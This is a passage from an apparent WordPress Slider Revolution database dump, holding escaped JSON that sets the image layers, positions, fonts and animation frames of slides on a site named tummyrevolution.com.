To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"60px\",\"e\":true},\"n\":{\"v\":\"60px\",\"e\":true},\"t\":{\"v\":\"60px\",\"e\":true},\"m\":{\"v\":\"45px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(25,11,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"solid\",\"color\":\"#2d2a2a\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Image 1\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/landing-footer-img1.png\",\"imageId\":3446},\"size\":{\"width\":{\"d\":{\"v\":\"317px\",\"e\":true},\"n\":{\"v\":\"280px\",\"e\":true},\"t\":{\"v\":\"198px\",\"e\":true},\"m\":{\"v\":\"124px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"365px\",\"e\":true},\"n\":{\"v\":\"322px\",\"e\":true},\"t\":{\"v\":\"228px\",\"e\":true},\"m\":{\"v\":\"143px\",\"e\":true}},\"originalWidth\":317,\"originalHeight\":365,\"aspectRatio\":{\"d\":{\"v\":0.86849315068493149194495117626502178609371185302734375},\"n\":{\"v\":0.86849315068493149194495117626502178609371185302734375},\"t\":{\"v\":0.86849315068493149194495117626502178609371185302734375},\"m\":{\"v\":0.86849315068493149194495117626502178609371185302734375}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"v\":\"-586px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-8px\",\"e\":true},\"n\":{\"v\":\"-200px\",\"e\":true},\"t\":{\"v\":\"-8px\",\"e\":true},\"m\":{\"v\":\"-34px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-100%\"},\"n\":{\"v\":\"-100%\"},\"t\":{\"v\":\"-100%\"},\"m\":{\"v\":\"-100%\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\"},\"2\":{\"text\":\"Image 2\",\"alias\":\"Image 2\",\"uid\":2,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-footer-img21.png\",\"imageId\":4603},\"size\":{\"width\":{\"d\":{\"v\":\"199px\",\"e\":true},\"n\":{\"v\":\"159px\",\"e\":true},\"t\":{\"v\":\"107px\",\"e\":true},\"m\":{\"v\":\"58px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"185px\",\"e\":true},\"n\":{\"v\":\"148px\",\"e\":true},\"t\":{\"v\":\"100px\",\"e\":true},\"m\":{\"v\":\"54px\",\"e\":true}},\"originalWidth\":199,\"originalHeight\":185,\"aspectRatio\":{\"d\":{\"v\":1.0756756756756755688542170901200734078884124755859375},\"n\":{\"v\":1.0756756756756755688542170901200734078884124755859375},\"t\":{\"v\":1.0756756756756755688542170901200734078884124755859375},\"m\":{\"v\":1.0756756756756755688542170901200734078884124755859375}}},\"position\":{\"x\":{\"d\":{\"v\":\"542px\",\"e\":true},\"n\":{\"v\":\"-127px\",\"e\":true},\"t\":{\"v\":\"417px\",\"e\":true},\"m\":{\"v\":\"218px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-7px\",\"e\":true},\"n\":{\"v\":\"-276px\",\"e\":true},\"t\":{\"v\":\"-2px\",\"e\":true},\"m\":{\"v\":\"-1px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":1,\"scaleY\":1,\"opacity\":1,\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":0,\"skewY\":0,\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power4.easeInOut\",\"speed\":500,\"start\":0},\"chars\":{\"use\":true,\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":1,\"scaleY\":1,\"opacity\":1,\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":0,\"skewY\":0,\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power4.easeInOut\",\"speed\":500,\"start\":0},\"chars\":{\"use\":true}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8250,\"endWithSlide\":true}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\"},\"3\":{\"text\":\"Image 3\",\"alias\":\"Image 3\",\"uid\":3,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide2-graphic31.png\",\"imageId\":4604},\"size\":{\"width\":{\"d\":{\"v\":\"240px\",\"e\":true},\"n\":{\"v\":\"218px\",\"e\":true},\"t\":{\"v\":\"147px\",\"e\":true},\"m\":{\"v\":\"119px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"205px\",\"e\":true},\"n\":{\"v\":\"186px\",\"e\":true},\"t\":{\"v\":\"125px\",\"e\":true},\"m\":{\"v\":\"101px\",\"e\":true}},\"originalWidth\":240,\"originalHeight\":205,\"aspectRatio\":{\"d\":{\"v\":1.1707317073170731003273203896242193877696990966796875},\"n\":{\"v\":1.1707317073170731003273203896242193877696990966796875},\"t\":{\"v\":1.1707317073170731003273203896242193877696990966796875},\"m\":{\"v\":1.1707317073170731003273203896242193877696990966796875}}},\"position\":{\"x\":{\"d\":{\"v\":\"154px\",\"e\":true},\"n\":{\"v\":\"154px\",\"e\":true},\"t\":{\"v\":\"-81px\",\"e\":true},\"m\":{\"v\":\"-69px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-69px\",\"e\":true},\"n\":{\"v\":\"-310px\",\"e\":true},\"t\":{\"v\":\"-74px\",\"e\":true},\"m\":{\"v\":\"-74px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\"},\"5\":{\"text\":\"Image 5\",\"alias\":\"Image 5\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide2-graphic41.png\",\"imageId\":4605},\"size\":{\"width\":{\"d\":{\"v\":\"328px\",\"e\":true},\"n\":{\"v\":\"273px\",\"e\":true},\"t\":{\"v\":\"217px\",\"e\":true},\"m\":{\"v\":\"101px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"339px\",\"e\":true},\"n\":{\"v\":\"282px\",\"e\":true},\"t\":{\"v\":\"224px\",\"e\":true},\"m\":{\"v\":\"104px\",\"e\":true}},\"originalWidth\":328,\"originalHeight\":339,\"aspectRatio\":{\"d\":{\"v\":0.96755162241887904261972153108217753469944000244140625},\"n\":{\"v\":0.96755162241887904261972153108217753469944000244140625},\"t\":{\"v\":0.96755162241887904261972153108217753469944000244140625},\"m\":{\"v\":0.96755162241887904261972153108217753469944000244140625}}},\"position\":{\"x\":{\"d\":{\"v\":\"90px\",\"e\":true},\"n\":{\"v\":\"585px\",\"e\":true},\"t\":{\"v\":\"5px\",\"e\":true},\"m\":{\"v\":\"5px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-10px\",\"e\":true},\"n\":{\"v\":\"-202px\",\"e\":true},\"t\":{\"v\":\"-4px\",\"e\":true},\"m\":{\"v\":\"-4px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":8,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"1